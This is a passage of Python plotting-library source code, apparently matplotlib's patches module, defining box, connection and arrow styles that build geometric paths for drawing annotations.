x0, y0 = x0 - pad, y0 - pad
return Path.circle((x0 + width / 2, y0 + height / 2),
max(width, height) / 2)
@_register_style(_style_list)
class LArrow(_Base):
"""
A box in the shape of a left-pointing arrow.
Parameters
----------
pad : float, default: 0.3
The amount of padding around the original box.
"""
def __init__(self, pad=0.3):
self.pad = pad
super().__init__()
def transmute(self, x0, y0, width, height, mutation_size):
# padding
pad = mutation_size * self.pad
# width and height with padding added.
width, height = width + 2 * pad, height + 2 * pad
# boundary of the padded box
x0, y0 = x0 - pad, y0 - pad,
x1, y1 = x0 + width, y0 + height
dx = (y1 - y0) / 2
dxx = dx / 2
x0 = x0 + pad / 1.4 # adjust by ~sqrt(2)
return Path([(x0 + dxx, y0), (x1, y0), (x1, y1), (x0 + dxx, y1),
(x0 + dxx, y1 + dxx), (x0 - dx, y0 + dx),
(x0 + dxx, y0 - dxx), # arrow
(x0 + dxx, y0), (x0 + dxx, y0)],
closed=True)
@_register_style(_style_list)
class RArrow(LArrow):
"""
A box in the shape of a right-pointing arrow.
Parameters
----------
pad : float, default: 0.3
The amount of padding around the original box.
"""
def __init__(self, pad=0.3):
super().__init__(pad)
def transmute(self, x0, y0, width, height, mutation_size):
p = BoxStyle.LArrow.transmute(self, x0, y0,
width, height, mutation_size)
p.vertices[:, 0] = 2 * x0 + width - p.vertices[:, 0]
return p
@_register_style(_style_list)
class DArrow(_Base):
"""
A box in the shape of a two-way arrow.
Parameters
----------
pad : float, default: 0.3
The amount of padding around the original box.
"""
# This source is copied from LArrow,
# modified to add a right arrow to the bbox.
def __init__(self, pad=0.3):
self.pad = pad
super().__init__()
def transmute(self, x0, y0, width, height, mutation_size):
# padding
pad = mutation_size * self.pad
# width and height with padding added.
# The width is padded by the arrows, so we don't need to pad it.
height = height + 2 * pad
# boundary of the padded box
x0, y0 = x0 - pad, y0 - pad
x1, y1 = x0 + width, y0 + height
dx = (y1 - y0) / 2
dxx = dx / 2
x0 = x0 + pad / 1.4 # adjust by ~sqrt(2)
return Path([(x0 + dxx, y0), (x1, y0), # bot-segment
(x1, y0 - dxx), (x1 + dx + dxx, y0 + dx),
(x1, y1 + dxx), # right-arrow
(x1, y1), (x0 + dxx, y1), # top-segment
(x0 + dxx, y1 + dxx), (x0 - dx, y0 + dx),
(x0 + dxx, y0 - dxx), # left-arrow
(x0 + dxx, y0), (x0 + dxx, y0)], # close-poly
closed=True)
@_register_style(_style_list)
class Round(_Base):
"""
A box with round corners.
Parameters
----------
pad : float, default: 0.3
The amount of padding around the original box.
rounding_size : float, default: *pad*
Radius of the corners.
"""
def __init__(self, pad=0.3, rounding_size=None):
self.pad = pad
self.rounding_size = rounding_size
super().__init__()
def transmute(self, x0, y0, width, height, mutation_size):
# padding
pad = mutation_size * self.pad
# size of the rounding corner
if self.rounding_size:
dr = mutation_size * self.rounding_size
else:
dr = pad
width, height = width + 2 * pad, height + 2 * pad
x0, y0 = x0 - pad, y0 - pad,
x1, y1 = x0 + width, y0 + height
# Round corners are implemented as quadratic Bezier, e.g.,
# [(x0, y0-dr), (x0, y0), (x0+dr, y0)] for lower left corner.
cp = [(x0 + dr, y0),
(x1 - dr, y0),
(x1, y0), (x1, y0 + dr),
(x1, y1 - dr),
(x1, y1), (x1 - dr, y1),
(x0 + dr, y1),
(x0, y1), (x0, y1 - dr),
(x0, y0 + dr),
(x0, y0), (x0 + dr, y0),
(x0 + dr, y0)]
com = [Path.MOVETO,
Path.LINETO,
Path.CURVE3, Path.CURVE3,
Path.LINETO,
Path.CURVE3, Path.CURVE3,
Path.LINETO,
Path.CURVE3, Path.CURVE3,
Path.LINETO,
Path.CURVE3, Path.CURVE3,
Path.CLOSEPOLY]
path = Path(cp, com)
return path
@_register_style(_style_list)
class Round4(_Base):
"""
A box with rounded edges.
Parameters
----------
pad : float, default: 0.3
The amount of padding around the original box.
rounding_size : float, default: *pad*/2
Rounding of edges.
"""
def __init__(self, pad=0.3, rounding_size=None):
self.pad = pad
self.rounding_size = rounding_size
super().__init__()
def transmute(self, x0, y0, width, height, mutation_size):
# padding
pad = mutation_size * self.pad
# Rounding size; defaults to half of the padding.
if self.rounding_size:
dr = mutation_size * self.rounding_size
else:
dr = pad / 2.
width = width + 2 * pad - 2 * dr
height = height + 2 * pad - 2 * dr
x0, y0 = x0 - pad + dr, y0 - pad + dr,
x1, y1 = x0 + width, y0 + height
cp = [(x0, y0),
(x0 + dr, y0 - dr), (x1 - dr, y0 - dr), (x1, y0),
(x1 + dr, y0 + dr), (x1 + dr, y1 - dr), (x1, y1),
(x1 - dr, y1 + dr), (x0 + dr, y1 + dr), (x0, y1),
(x0 - dr, y1 - dr), (x0 - dr, y0 + dr), (x0, y0),
(x0, y0)]
com = [Path.MOVETO,
Path.CURVE4, Path.CURVE4, Path.CURVE4,
Path.CURVE4, Path.CURVE4, Path.CURVE4,
Path.CURVE4, Path.CURVE4, Path.CURVE4,
Path.CURVE4, Path.CURVE4, Path.CURVE4,
Path.CLOSEPOLY]
path = Path(cp, com)
return path
@_register_style(_style_list)
class Sawtooth(_Base):
"""
A box with a sawtooth outline.
Parameters
----------
pad : float, default: 0.3
The amount of padding around the original box.
tooth_size : float, default: *pad*/2
Size of the sawtooth.
"""
def __init__(self, pad=0.3, tooth_size=None):
self.pad = pad
self.tooth_size = tooth_size
super().__init__()
def _get_sawtooth_vertices(self, x0, y0, width, height, mutation_size):
# padding
pad = mutation_size * self.pad
# size of sawtooth
if self.tooth_size is None:
tooth_size = self.pad * .5 * mutation_size
else:
tooth_size = self.tooth_size * mutation_size
tooth_size2 = tooth_size / 2
width = width + 2 * pad - tooth_size
height = height + 2 * pad - tooth_size
# the sizes of the vertical and horizontal sawtooth are
# separately adjusted to fit the given box size.
dsx_n = int(round((width - tooth_size) / (tooth_size * 2))) * 2
dsx = (width - tooth_size) / dsx_n
dsy_n = int(round((height - tooth_size) / (tooth_size * 2))) * 2
dsy = (height - tooth_size) / dsy_n
x0, y0 = x0 - pad + tooth_size2, y0 - pad + tooth_size2
x1, y1 = x0 + width, y0 + height
bottom_saw_x = [
x0,
*(x0 + tooth_size2 + dsx * .5 * np.arange(dsx_n * 2)),
x1 - tooth_size2,
]
bottom_saw_y = [
y0,
*([y0 - tooth_size2, y0, y0 + tooth_size2, y0] * dsx_n),
y0 - tooth_size2,
]
right_saw_x = [
x1,
*([x1 + tooth_size2, x1, x1 - tooth_size2, x1] * dsx_n),
x1 + tooth_size2,
]
right_saw_y = [
y0,
*(y0 + tooth_size2 + dsy * .5 * np.arange(dsy_n * 2)),
y1 - tooth_size2,
]
top_saw_x = [
x1,
*(x1 - tooth_size2 - dsx * .5 * np.arange(dsx_n * 2)),
x0 + tooth_size2,
]
top_saw_y = [
y1,
*([y1 + tooth_size2, y1, y1 - tooth_size2, y1] * dsx_n),
y1 + tooth_size2,
]
left_saw_x = [
x0,
*([x0 - tooth_size2, x0, x0 + tooth_size2, x0] * dsy_n),
x0 - tooth_size2,
]
left_saw_y = [
y1,
*(y1 - tooth_size2 - dsy * .5 * np.arange(dsy_n * 2)),
y0 + tooth_size2,
]
saw_vertices = [*zip(bottom_saw_x, bottom_saw_y),
*zip(right_saw_x, right_saw_y),
*zip(top_saw_x, top_saw_y),
*zip(left_saw_x, left_saw_y),
(bottom_saw_x[0], bottom_saw_y[0])]
return saw_vertices
def transmute(self, x0, y0, width, height, mutation_size):
saw_vertices = self._get_sawtooth_vertices(x0, y0, width,
height, mutation_size)
path = Path(saw_vertices, closed=True)
return path
@_register_style(_style_list)
class Roundtooth(Sawtooth):
"""
A box with a rounded sawtooth outline.
Parameters
----------
pad : float, default: 0.3
The amount of padding around the original box.
tooth_size : float, default: *pad*/2
Size of the sawtooth.
"""
def __init__(self, pad=0.3, tooth_size=None):
super().__init__(pad, tooth_size)
def transmute(self, x0, y0, width, height, mutation_size):
saw_vertices = self._get_sawtooth_vertices(x0, y0,
width, height,
mutation_size)
# Add a trailing vertex to allow us to close the polygon correctly
saw_vertices = np.concatenate([saw_vertices, [saw_vertices[0]]])
codes = ([Path.MOVETO] +
[Path.CURVE3, Path.CURVE3] * ((len(saw_vertices)-1)//2) +
[Path.CLOSEPOLY])
return Path(saw_vertices, codes)
class ConnectionStyle(_Style):
"""
`ConnectionStyle` is a container class which defines
several connectionstyle classes, which is used to create a path
between two points. These are mainly used with `FancyArrowPatch`.
A connectionstyle object can be either created as::
ConnectionStyle.Arc3(rad=0.2)
or::
ConnectionStyle("Arc3", rad=0.2)
or::
ConnectionStyle("Arc3, rad=0.2")
The following classes are defined
%(AvailableConnectorstyles)s
An instance of any connection style class is an callable object,
whose call signature is::
__call__(self, posA, posB,
patchA=None, patchB=None,
shrinkA=2., shrinkB=2.)
and it returns a `.Path` instance. *posA* and *posB* are
tuples of (x, y) coordinates of the two points to be
connected. *patchA* (or *patchB*) is given, the returned path is
clipped so that it start (or end) from the boundary of the
patch. The path is further shrunk by *shrinkA* (or *shrinkB*)
which is given in points.
"""
_style_list = {}
class _Base:
"""
A base class for connectionstyle classes. The subclass needs
to implement a *connect* method whose call signature is::
connect(posA, posB)
where posA and posB are tuples of x, y coordinates to be
connected. The method needs to return a path connecting two
points. This base class defines a __call__ method, and a few
helper methods.
"""
class SimpleEvent:
def __init__(self, xy):
self.x, self.y = xy
def _clip(self, path, patchA, patchB):
"""
Clip the path to the boundary of the patchA and patchB.
The starting point of the path needed to be inside of the
patchA and the end point inside the patch B. The *contains*
methods of each patch object is utilized to test if the point
is inside the path.
"""
if patchA:
def insideA(xy_display):
xy_event = ConnectionStyle._Base.SimpleEvent(xy_display)
return patchA.contains(xy_event)[0]
try:
left, right = split_path_inout(path, insideA)
except ValueError:
right = path
path = right
if patchB:
def insideB(xy_display):
xy_event = ConnectionStyle._Base.SimpleEvent(xy_display)
return patchB.contains(xy_event)[0]
try:
left, right = split_path_inout(path, insideB)
except ValueError:
left = path
path = left
return path
def _shrink(self, path, shrinkA, shrinkB):
"""
Shrink the path by fixed size (in points) with shrinkA and shrinkB.
"""
if shrinkA:
insideA = inside_circle(*path.vertices[0], shrinkA)
try:
left, path = split_path_inout(path, insideA)
except ValueError:
pass
if shrinkB:
insideB = inside_circle(*path.vertices[-1], shrinkB)
try:
path, right = split_path_inout(path, insideB)
except ValueError:
pass
return path
def __call__(self, posA, posB,
shrinkA=2., shrinkB=2., patchA=None, patchB=None):
"""
Call the *connect* method to create a path between *posA* and
*posB*; then clip and shrink the path.
"""
path = self.connect(posA, posB)
clipped_path = self._clip(path, patchA, patchB)
shrunk_path = self._shrink(clipped_path, shrinkA, shrinkB)
return shrunk_path
@_register_style(_style_list)
class Arc3(_Base):
"""
Creates a simple quadratic Bezier curve between two
points. The curve is created so that the middle control point
(C1) is located at the same distance from the start (C0) and
end points(C2) and the distance of the C1 to the line
connecting C0-C2 is *rad* times the distance of C0-C2.
"""
def __init__(self, rad=0.):
"""
*rad*
curvature of the curve.
"""
self.rad = rad
def connect(self, posA, posB):
x1, y1 = posA
x2, y2 = posB
x12, y12 = (x1 + x2) / 2., (y1 + y2) / 2.
dx, dy = x2 - x1, y2 - y1
f = self.rad
cx, cy = x12 + f * dy, y12 - f * dx
vertices = [(x1, y1),
(cx, cy),
(x2, y2)]
codes = [Path.MOVETO,
Path.CURVE3,
Path.CURVE3]
return Path(vertices, codes)
@_register_style(_style_list)
class Angle3(_Base):
"""
Creates a simple quadratic Bezier curve between two
points. The middle control points is placed at the
intersecting point of two lines which cross the start and
end point, and have a slope of angleA and angleB, respectively.
"""
def __init__(self, angleA=90, angleB=0):
"""
*angleA*
starting angle of the path
*angleB*
ending angle of the path
"""
self.angleA = angleA
self.angleB = angleB
def connect(self, posA, posB):
x1, y1 = posA
x2, y2 = posB
cosA = math.cos(math.radians(self.angleA))
sinA = math.sin(math.radians(self.angleA))
cosB = math.cos(math.radians(self.angleB))
sinB = math.sin(math.radians(self.angleB))
cx, cy = get_intersection(x1, y1, cosA, sinA,
x2, y2, cosB, sinB)
vertices = [(x1, y1), (cx, cy), (x2, y2)]
codes = [Path.MOVETO, Path.CURVE3, Path.CURVE3]
return Path(vertices, codes)
@_register_style(_style_list)
class Angle(_Base):
"""
Creates a piecewise continuous quadratic Bezier path between
two points. The path has a one passing-through point placed at
the intersecting point of two lines which cross the start
and end point, and have a slope of angleA and angleB, respectively.
The connecting edges are rounded with *rad*.
"""
def __init__(self, angleA=90, angleB=0, rad=0.):
"""
*angleA*
starting angle of the path
*angleB*
ending angle of the path
*rad*
rounding radius of the edge
"""
self.angleA = angleA
self.angleB = angleB
self.rad = rad
def connect(self, posA, posB):
x1, y1 = posA
x2, y2 = posB
cosA = math.cos(math.radians(self.angleA))
sinA = math.sin(math.radians(self.angleA))
cosB = math.cos(math.radians(self.angleB))
sinB = math.sin(math.radians(self.angleB))
cx, cy = get_intersection(x1, y1, cosA, sinA,
x2, y2, cosB, sinB)
vertices = [(x1, y1)]
codes = [Path.MOVETO]
if self.rad == 0.:
vertices.append((cx, cy))
codes.append(Path.LINETO)
else:
dx1, dy1 = x1 - cx, y1 - cy
d1 = np.hypot(dx1, dy1)
f1 = self.rad / d1
dx2, dy2 = x2 - cx, y2 - cy
d2 = np.hypot(dx2, dy2)
f2 = self.rad / d2
vertices.extend([(cx + dx1 * f1, cy + dy1 * f1),
(cx, cy),
(cx + dx2 * f2, cy + dy2 * f2)])
codes.extend([Path.LINETO, Path.CURVE3, Path.CURVE3])
vertices.append((x2, y2))
codes.append(Path.LINETO)
return Path(vertices, codes)
@_register_style(_style_list)
class Arc(_Base):
"""
Creates a piecewise continuous quadratic Bezier path between
two points. The path can have two passing-through points, a
point placed at the distance of armA and angle of angleA from
point A, another point with respect to point B. The edges are
rounded with *rad*.
"""
def __init__(self, angleA=0, angleB=0, armA=None, armB=None, rad=0.):
"""
*angleA* :
starting angle of the path
*angleB* :
ending angle of the path
*armA* :
length of the starting arm
*armB* :
length of the ending arm
*rad* :
rounding radius of the edges
"""
self.angleA = angleA
self.angleB = angleB
self.armA = armA
self.armB = armB
self.rad = rad
def connect(self, posA, posB):
x1, y1 = posA
x2, y2 = posB
vertices = [(x1, y1)]
rounded = []
codes = [Path.MOVETO]
if self.armA:
cosA = math.cos(math.radians(self.angleA))
sinA = math.sin(math.radians(self.angleA))
# x_armA, y_armB
d = self.armA - self.rad
rounded.append((x1 + d * cosA, y1 + d * sinA))
d = self.armA
rounded.append((x1 + d * cosA, y1 + d * sinA))
if self.armB:
cosB = math.cos(math.radians(self.angleB))
sinB = math.sin(math.radians(self.angleB))
x_armB, y_armB = x2 + self.armB * cosB, y2 + self.armB * sinB
if rounded:
xp, yp = rounded[-1]
dx, dy = x_armB - xp, y_armB - yp
dd = (dx * dx + dy * dy) ** .5
rounded.append((xp + self.rad * dx / dd,
yp + self.rad * dy / dd))
vertices.extend(rounded)
codes.extend([Path.LINETO,
Path.CURVE3,
Path.CURVE3])
else:
xp, yp = vertices[-1]
dx, dy = x_armB - xp, y_armB - yp
dd = (dx * dx + dy * dy) ** .5
d = dd - self.rad
rounded = [(xp + d * dx / dd, yp + d * dy / dd),
(x_armB, y_armB)]
if rounded:
xp, yp = rounded[-1]
dx, dy = x2 - xp, y2 - yp
dd = (dx * dx + dy * dy) ** .5
rounded.append((xp + self.rad * dx / dd,
yp + self.rad * dy / dd))
vertices.extend(rounded)
codes.extend([Path.LINETO,
Path.CURVE3,
Path.CURVE3])
vertices.append((x2, y2))
codes.append(Path.LINETO)
return Path(vertices, codes)
@_register_style(_style_list)
class Bar(_Base):
"""
A line with *angle* between A and B with *armA* and
*armB*. One of the arms is extended so that they are connected in
a right angle. The length of armA is determined by (*armA*
+ *fraction* x AB distance). Same for armB.
"""
def __init__(self, armA=0., armB=0., fraction=0.3, angle=None):
"""
Parameters
----------
armA : float
minimum length of armA
armB : float
minimum length of armB
fraction : float
a fraction of the distance between two points that
will be added to armA and armB.
angle : float or None
angle of the connecting line (if None, parallel
to A and B)
"""
self.armA = armA
self.armB = armB
self.fraction = fraction
self.angle = angle
def connect(self, posA, posB):
x1, y1 = posA
x20, y20 = x2, y2 = posB
theta1 = math.atan2(y2 - y1, x2 - x1)
dx, dy = x2 - x1, y2 - y1
dd = (dx * dx + dy * dy) ** .5
ddx, ddy = dx / dd, dy / dd
armA, armB = self.armA, self.armB
if self.angle is not None:
theta0 = np.deg2rad(self.angle)
dtheta = theta1 - theta0
dl = dd * math.sin(dtheta)
dL = dd * math.cos(dtheta)
x2, y2 = x1 + dL * math.cos(theta0), y1 + dL * math.sin(theta0)
armB = armB - dl
# update
dx, dy = x2 - x1, y2 - y1
dd2 = (dx * dx + dy * dy) ** .5
ddx, ddy = dx / dd2, dy / dd2
arm = max(armA, armB)
f = self.fraction * dd + arm
cx1, cy1 = x1 + f * ddy, y1 - f * ddx
cx2, cy2 = x2 + f * ddy, y2 - f * ddx
vertices = [(x1, y1),
(cx1, cy1),
(cx2, cy2),
(x20, y20)]
codes = [Path.MOVETO,
Path.LINETO,
Path.LINETO,
Path.LINETO]
return Path(vertices, codes)
def _point_along_a_line(x0, y0, x1, y1, d):
"""
Return the point on the line connecting (*x0*, *y0*) -- (*x1*, *y1*) whose
distance from (*x0*, *y0*) is *d*.
"""
dx, dy = x0 - x1, y0 - y1
ff = d / (dx * dx + dy * dy) ** .5
x2, y2 = x0 - ff * dx, y0 - ff * dy
return x2, y2
class ArrowStyle(_Style):
"""
`ArrowStyle` is a container class which defines several
arrowstyle classes, which is used to create an arrow path along a
given path. These are mainly used with `FancyArrowPatch`.
A arrowstyle object can be either created as::
ArrowStyle.Fancy(head_length=.4, head_width=.4, tail_width=.4)
or::
ArrowStyle("Fancy", head_length=.4, head_width=.4, tail_width=.4)
or::
ArrowStyle("Fancy, head_length=.4, head_width=.4, tail_width=.4")
The following classes are defined
%(AvailableArrowstyles)s
An instance of any arrow style class is a callable object,
whose call signature is::
__call__(self, path, mutation_size, linewidth, aspect_ratio=1.)
and it returns a tuple of a `.Path` instance and a boolean
value. *path* is a `.Path` instance along which the arrow
will be drawn. *mutation_size* and *aspect_ratio* have the same
meaning as in `BoxStyle`. *linewidth* is a line width to be
stroked. This is meant to be used to correct the location of the
head so that it does not overshoot the destination point, but not all
classes support it.
"""
_style_list = {}
class _Base:
"""
Arrow Transmuter Base class
ArrowTransmuterBase and its derivatives are used to make a fancy
arrow around a given path. The __call__ method returns a path
(which will be used to create a PathPatch instance) and a boolean
value indicating the path is open therefore is not fillable. This
class is not an artist and actual drawing of the fancy arrow is
done by the FancyArrowPatch class.
"""
# The derived classes are required to be able to be initialized
# w/o arguments, i.e., all its argument (except self) must have
# the default values.
@staticmethod
def ensure_quadratic_bezier(path):
"""
Some ArrowStyle class only works with a simple quadratic Bezier
curve (created with Arc3Connection or Angle3Connector). This static
method is to check if the provided path is a simple quadratic
Bezier curve and returns its control points if true.
"""
segments = list(path.iter_segments())
if (len(segments) != 2 or segments[0][1] != Path.MOVETO or
segments[1][1] != Path.CURVE3):
raise ValueError(
"'path' is not a valid quadratic Bezier curve")
return [*segments[0][0], *segments[1][0]]
def transmute(self, path, mutation_size, linewidth):
"""
The transmute method is the very core of the ArrowStyle class and
must be overridden in the subclasses. It receives the path object
along which the arrow will be drawn, and the mutation_size, with
which the arrow head etc. will be scaled. The linewidth may be
used to adjust the path so that it does not pass beyond the given
points. It returns a tuple of a Path instance and a boolean. The
boolean value indicate whether the path can be filled or not. The
return value can also be a list of paths and list of booleans of a
same length.
"""
raise NotImplementedError('Derived must override')
def __call__(self, path, mutation_size, linewidth,
aspect_ratio=1.):
"""
The __call__ method is a thin wrapper around the transmute method
and takes care of the aspect ratio.
"""
if aspect_ratio is not None:
# Squeeze the given height by the aspect_ratio
vertices = path.vertices / [1, aspect_ratio]
path_shrunk = Path(vertices, path.codes)
# call transmute method with squeezed height.
path_mutated, fillable = self.transmute(path_shrunk,
linewidth,
mutation_size)
if np.iterable(fillable):
path_list = []
for p in zip(path_mutated):
# Restore the height
path_list.append(
Path(p.vertices * [1, aspect_ratio], p.codes))
return path_list, fillable
else:
return path_mutated, fillable
else:
return self.transmute(path, mutation_size, linewidth)
class _Curve(_Base):
"""
A simple arrow which will work with any path instance. The
returned path is simply concatenation of the original path + at
most two paths representing the arrow head at the begin point and the
at the end point. The arrow heads can be either open or closed.
"""
def __init__(self, beginarrow=None, endarrow=None,
fillbegin=False, fillend=False,
head_length=.2, head_width=.1):
"""
The arrows are drawn if *beginarrow* and/or *endarrow* are
true. *head_length* and *head_width* determines the size
of the arrow relative to the *mutation scale*. The
arrowhead at the begin (or end) is closed if fillbegin (or
fillend) is True.
"""
self.beginarrow, self.endarrow = beginarrow, endarrow
self.head_length, self.head_width = head_length, head_width
self.fillbegin, self.fillend = fillbegin, fillend
super().__init__()
def _get_arrow_wedge(self, x0, y0, x1, y1,
head_dist, cos_t, sin_t, linewidth):
"""
Return the paths for arrow heads. Since arrow lines are
drawn with capstyle=projected, The arrow goes beyond the
desired point. This method also returns the amount of the path
to be shrunken so that it does not overshoot.
"""
# arrow from x0, y0 to x1, y1
dx, dy = x0 - x1, y0 - y1
cp_distance = np.hypot(dx, dy)
# pad_projected : amount of pad to account the
# overshooting of the projection of the wedge
pad_projected = (.5 * linewidth / sin_t)
# Account for division by zero
if cp_distance == 0:
cp_distance = 1
# apply pad for projected edge
ddx = pad_projected * dx / cp_distance
ddy = pad_projected * dy / cp_distance
# offset for arrow wedge
dx = dx / cp_distance * head_dist
dy = dy / cp_distance * head_dist
dx1, dy1 = cos_t * dx + sin_t * dy, -sin_t * dx + cos_t * dy
dx2, dy2 = cos_t * dx - sin_t * dy, sin_t * dx + cos_t * dy
vertices_arrow = [(x1 + ddx + dx1, y1 + ddy + dy1),
(x1 + ddx, y1 + ddy),
(x1 + ddx + dx2, y1 + ddy + dy2)]
codes_arrow = [Path.MOVETO,
Path.LINETO,
Path.LINETO]
return vertices_arrow, codes_arrow, ddx, ddy
def transmute(self, path, mutation_size, linewidth):
head_length = self.head_length * mutation_size
head_width = self.head_width * mutation_size
head_dist = np.hypot(head_length, head_width)
cos_t, sin_t = head_length / head_dist, head_width / head_dist
# begin arrow
x0, y0 = path.vertices[0]
x1, y1 = path.vertices[1]
# If there is no room for an arrow and a line, then skip the arrow
has_begin_arrow = self.beginarrow and (x0, y0) != (x1, y1)
verticesA, codesA, ddxA, ddyA = (
self._get_arrow_wedge(x1, y1, x0, y0,
head_dist, cos_t, sin_t, linewidth)
if has_begin_arrow
else ([], [], 0, 0)
)
# end arrow
x2, y2 = path.vertices[-2]
x3, y3 = path.vertices[-1]
# If there is no room for an arrow and a line, then skip the arrow
has_end_arrow = self.endarrow and (x2, y2) != (x3, y3)
verticesB, codesB, ddxB, ddyB = (
self._get_arrow_wedge(x2, y2, x3, y3,
head_dist, cos_t, sin_t, linewidth)
if has_end_arrow
else ([], [], 0, 0)
)
# This simple code will not work if ddx, ddy is greater than the
# separation between vertices.
_path = [Path(np.concatenate([[(x0 + ddxA, y0 + ddyA)],
path.vertices[1:-1],
[(x3 + ddxB, y3 + ddyB)]]),
path.codes)]
_fillable = [False]
if has_begin_arrow:
if self.fillbegin:
p = np.concatenate([verticesA, [verticesA[0],
verticesA[0]], ])
c = np.concatenate([codesA, [Path.LINETO, Path.CLOSEPOLY]])
_path.append(Path(p, c))
_fillable.append(True)
else:
_path.append(Path(verticesA, codesA))
_fillable.append(False)
if has_end_arrow:
if self.fillend:
_fillable.append(True)
p = np.concatenate([verticesB, [verticesB[0],
verticesB[0]], ])
c = np.concatenate([codesB, [Path.LINETO, Path.CLOSEPOLY]])
_path.append(Path(p, c))
else:
_fillable.append(False)
_path.append(Path(verticesB, codesB))
return _path, _fillable
@_register_style(_style_list, name="-")
class Curve(_Curve):
"""A simple curve without any arrow head."""
def __init__(self):
super().__init__(beginarrow=False, endarrow=False)
@_register_style(_style_list, name="<-")
class CurveA(_Curve):
"""An arrow with a head at its begin point."""
def __init__(self, head_length=.4, head_width=.2):
"""
Parameters
----------
head_length : float, default: 0.4
Length of the arrow head.
head_width : float, default: 0.2
Width of the arrow head.
"""
super().__init__(beginarrow=True, endarrow=False,
head_length=head_length, head_width=head_width)
@_register_style(_style_list, name="->")
class CurveB(_Curve):
"""An arrow with a head at its end point."""
def __init__(self, head_length=.4, head_width=.2):
"""
Parameters
----------
head_length : float, default: 0.4
Length of the arrow head.
head_width : float, default: 0.2
Width of the arrow head.
"""
super().__init__(beginarrow=False, endarrow=True,
head_length=head_length, head_width=head_width)
@_register_style(_style_list, name="<->")
class CurveAB(_Curve):
"""An arrow with heads both at the begin and the end point."""
def __init__(self, head_length=.4, head_width=.2):
"""
Parameters
----------
head_length : float, default: 0.4
Length of the arrow head.
head_width : float, default: 0.2
Width of the arrow head.
"""
super().__init__(beginarrow=True, endarrow=True,
head_length=head_length, head_width=head_width)
@_register_style(_style_list, name="<|-")
class CurveFilledA(_Curve):
"""An arrow with filled triangle head at the begin."""
def __init__(self, head_length=.4, head_width=.2):
"""
Parameters
----------
head_length : float, default: 0.4
Length of the arrow head.
head_width : float, default: 0.2
Width of the arrow head.
"""
super().__init__(beginarrow=True, endarrow=False,
fillbegin=True, fillend=False,
head_length=head_length, head_width=head_width)
@_register_style(_style_list, name="-|>")
class CurveFilledB(_Curve):
"""An arrow with filled triangle head at the end."""
def __init__(self, head_length=.4, head_width=.2):
"""
Parameters
----------
head_length : float, default: 0.4
Length of the arrow head.
head_width : float, default: 0.2
Width of the arrow head.
"""
super().__init__(beginarrow=False, endarrow=True,
fillbegin=False, fillend=True,
head_length=head_length, head_width=head_width)
@_register_style(_style_list, name="<|-|>")
class CurveFilledAB(_Curve):
"""An arrow with filled triangle heads at both ends."""
def __init__(self, head_length=.4, head_width=.2):
"""
Parameters
----------
head_length : float, default: 0.4
Length of the arrow head.
head_width : float, default: 0.2
Width of the arrow head.
"""
super().__init__(beginarrow=True, endarrow=True,
fillbegin=True, fillend=True,
head_length=head_length, head_width=head_width)
class _Bracket(_Base):
def __init__(self, bracketA=None, bracketB=None,
widthA=1., widthB=1.,
lengthA=0.2, lengthB=0.2,
angleA=None, angleB=None,
scaleA=None, scaleB=None):
self.bracketA, self.bracketB = bracketA, bracketB
self.widthA, self.widthB = widthA, widthB
self.lengthA, self.lengthB = lengthA, lengthB
self.angleA, self.angleB = angleA, angleB
self.scaleA, self.scaleB = scaleA, scaleB
def _get_bracket(self, x0, y0,
cos_t, sin_t, width, length):
# arrow from x0, y0 to x1, y1
from matplotlib.bezier import get_normal_points
x1, y1, x2, y2 = get_normal_points(x0, y0, cos_t, sin_t, width)
dx, dy = length * cos_t, length * sin_t
vertices_arrow = [(x1 + dx, y1 + dy),
(x1, y1),
(x2, y2),
(x2 + dx, y2 + dy)]
codes_arrow = [Path.MOVETO,
Path.LINETO,
Path.LINETO,
Path.LINETO]
return vertices_arrow, codes_arrow
def transmute(self, path, mutation_size, linewidth):
if self.scaleA is None:
scaleA = mutation_size
else:
scaleA = self.scaleA
if self.scaleB is None:
scaleB = mutation_size
else:
scaleB = self.scaleB
vertices_list, codes_list = [], []
if self.bracketA:
x0, y0 = path.vertices[0]
x1, y1 = path.vertices[1]
cos_t, sin_t = get_cos_sin(x1, y1, x0, y0)
verticesA, codesA = self._get_bracket(x0, y0, cos_t, sin_t,
self.widthA * scaleA,
self.lengthA * scaleA)
vertices_list.append(verticesA)
codes_list.append(codesA)
vertices_list.append(path.vertices)
codes_list.append(path.codes)
if self.bracketB:
x0, y0 = path.vertices[-1]
x1, y1 = path.vertices[-2]
cos_t, sin_t = get_cos_sin(x1, y1, x0, y0)
verticesB, codesB = self._get_bracket(x0, y0, cos_t, sin_t,
self.widthB * scaleB,
self.lengthB * scaleB)
vertices_list.append(verticesB)
codes_list.append(codesB)
vertices = np.concatenate(vertices_list)
codes = np.concatenate(codes_list)
p = Path(vertices, codes)
return p, False
@_register_style(_style_list, name="]-[")
class BracketAB(_Bracket):
"""An arrow with outward square brackets at both ends."""
def __init__(self,
widthA=1., lengthA=0.2, angleA=None,
widthB=1., lengthB=0.2, angleB=None):
"""
Parameters
----------
widthA : float, default: 1.0
Width of the bracket.
lengthA : float, default: 0.2
Length of the bracket.
angleA : float, default: None
Angle between the bracket and the line.
widthB : float, default: 1.0
Width of the bracket.
lengthB : float, default: 0.2
Length of the bracket.
angleB : float, default: None
Angle between the bracket and the line.
"""
super().__init__(True, True,
widthA=widthA, lengthA=lengthA, angleA=angleA,
widthB=widthB, lengthB=lengthB, angleB=angleB)
@_register_style(_style_list, name="]-")
class BracketA(_Bracket):
"""An arrow with an outward square bracket at its start."""
def __init__(self, widthA=1., lengthA=0.2, angleA=None):
"""
Parameters
----------
widthA : float, default: 1.0
Width of the bracket.
lengthA : float, default: 0.2
Length of the bracket.
angleA : float, default: None
Angle between the bracket and the line.
"""
super().__init__(True, None,
widthA=widthA, lengthA=lengthA, angleA=angleA)
@_register_style(_style_list, name="-[")
class BracketB(_Bracket):
"""An arrow with an outward square bracket at its end."""
def __init__(self, widthB=1., lengthB=0.2, angleB=None):
"""
Parameters
----------
widthB : float, default: 1.0
Width of the bracket.
lengthB : float, default: 0.2
Length of the bracket.
angleB : float, default: None
Angle between the bracket and the line.
"""
super().__init__(None, True,
widthB=widthB, lengthB=lengthB, angleB=angleB)
@_register_style(_style_list, name="|-|")
class BarAB(_Bracket):
"""An arrow with vertical bars ``|`` at both ends."""
def __init__(self,
widthA=1., angleA=None,
widthB=1., angleB=None):
"""
Parameters
----------
widthA : float, default: 1.0
Width of the bracket.
angleA : float, default: None
Angle between the bracket and the line.
widthB : float, default: 1.0
Width of the bracket.
angleB : float, default: None
Angle between the bracket and the line.
"""
super().__init__(True, True,
